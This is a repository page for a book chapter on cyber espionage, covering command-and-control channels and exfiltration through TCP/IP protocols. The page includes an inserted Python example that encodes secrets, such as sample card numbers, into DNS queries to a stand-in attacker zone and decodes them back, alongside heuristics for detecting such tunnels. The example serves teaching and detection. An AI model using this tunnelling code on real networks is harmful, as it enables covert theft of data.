The underbelly of cyber espionage

Author Identifier (ORCID)

Mohiuddin Ahmed: https://orcid.org/0000-0002-4559-4768

Abstract

Data exfiltration is one of the primary objectives of cyber espionage, and it depends on command and control (C2) infrastructure. This chapter explores how the protocols of the Transmission Control Protocol/Internet Protocol (TCP/IP) suite can be exploited or manipulated to establish covert channels for data exfiltration. It highlights the use of both standard protocols, such as HTTP, SSH, TCP, UDP and DNS, and custom protocols that leverage the TCP/IP stack for C2 communication. Key methods include modifying protocol header fields to conceal data and using protocol tunnelling to disguise traffic by wrapping it in another protocol. The chapter concludes by examining the numerous attack vectors and the commonly used tools and techniques for C2 and data exfiltration, highlighting the challenges associated with their detection and mitigation.
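The protocol-tunnelling technique the abstract describes, wrapping exfiltrated data in another protocol's traffic, is shown below for the DNS case, together with the kind of detection check a defender would run against it. This is an added example written for this page, not code from the chapter or its authors: the zone name `cdn-updates.example`, the secret, and the thresholds in `suspicious()` are constructed assumptions, and the page-level heuristic is deliberately simple.

```python
"""Added example: a minimal DNS-tunnelling exfiltration channel plus two
detection heuristics. Illustrative code written for this page, not the
chapter's own material; zone, secret and thresholds are assumptions."""
import base64
import math
from collections import Counter

# Constructed sample data (assumed): an attacker-controlled zone and a secret.
TUNNEL_ZONE = "cdn-updates.example"
SECRET = b"card=4111111111111111;exp=12/29;cvv=123\n" * 4

MAX_LABEL = 63          # RFC 1035: a label is at most 63 octets
LABELS_PER_QUERY = 2    # keeps each name well under the 253-octet name limit


def encode_queries(data: bytes, zone: str = TUNNEL_ZONE) -> list[str]:
    """Wrap data in DNS query names of the form <seq>.<chunk>.<chunk>.<zone>.

    base32 keeps every label inside the hostname character set; the leading
    sequence label lets the receiver reorder queries that arrive out of order.
    """
    payload = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(payload), per_query)):
        piece = payload[start:start + per_query]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([str(seq), *labels, zone]))
    return names


def decode_queries(names: list[str], zone: str = TUNNEL_ZONE) -> bytes:
    """Reassemble the secret from query names observed at the zone's resolver."""
    suffix = "." + zone
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue                        # unrelated query, ignore it
        labels = name[:-len(suffix)].split(".")
        pieces[int(labels[0])] = "".join(labels[1:])
    payload = "".join(pieces[k] for k in sorted(pieces)).upper()
    payload += "=" * (-len(payload) % 8)    # restore the base32 padding
    return base64.b32decode(payload)


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of the given string."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def suspicious(name: str, zone_depth: int = 2) -> dict:
    """Per-query heuristic: very long labels, or long high-entropy subdomains.

    zone_depth assumes the registered zone is the last two labels (assumption);
    a real deployment should consult a public-suffix list instead.
    """
    labels = name.rstrip(".").split(".")
    sub = labels[:-zone_depth]
    subtext = "".join(sub)
    longest = max((len(lab) for lab in sub), default=0)
    entropy = shannon_entropy(subtext)
    flag = longest >= 40 or (len(subtext) >= 30 and entropy >= 3.5)
    return {"name": name, "longest_label": longest,
            "entropy": round(entropy, 2), "flag": flag}


def unique_subdomains_per_zone(names: list[str], zone_depth: int = 2) -> Counter:
    """Volume heuristic: a tunnel produces many distinct names under one zone."""
    seen: dict[str, set[str]] = {}
    for name in names:
        labels = name.rstrip(".").split(".")
        zone = ".".join(labels[-zone_depth:])
        seen.setdefault(zone, set()).add(name)
    return Counter({zone: len(subs) for zone, subs in seen.items()})


if __name__ == "__main__":
    queries = encode_queries(SECRET)
    for q in queries:
        print(suspicious(q))
    assert decode_queries(queries) == SECRET
    print(unique_subdomains_per_zone(queries + ["www.example.com"]))
```

The per-query check catches the full-size chunks (a 63-character label is hard to explain for a legitimate hostname), but the short tail query carrying the last few bytes passes it, which is why the volume heuristic is needed alongside it: counting distinct subdomains per zone over a window surfaces a tunnel even when every individual name is kept short.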

Keywords

Cyberespionage, exfiltration, TCP/IP

Document Type

Book Chapter

Date of Publication

1-1-2026

Volume

1242

Publication Title

Studies in Computational Intelligence

Publisher

Springer

School

School of Science

Comments

Gaber, M., & Ahmed, M. (2026). The underbelly of cyber espionage. In M. Ahmed & S. D. Bachmann (Eds.), Cyber espionage and national security challenges (pp. 65–91). Springer. https://doi.org/10.1007/978-3-032-09423-0_4

Copyright

subscription content

First Page

65

Last Page

91


Link to publisher version (DOI)

10.1007/978-3-032-09423-0_4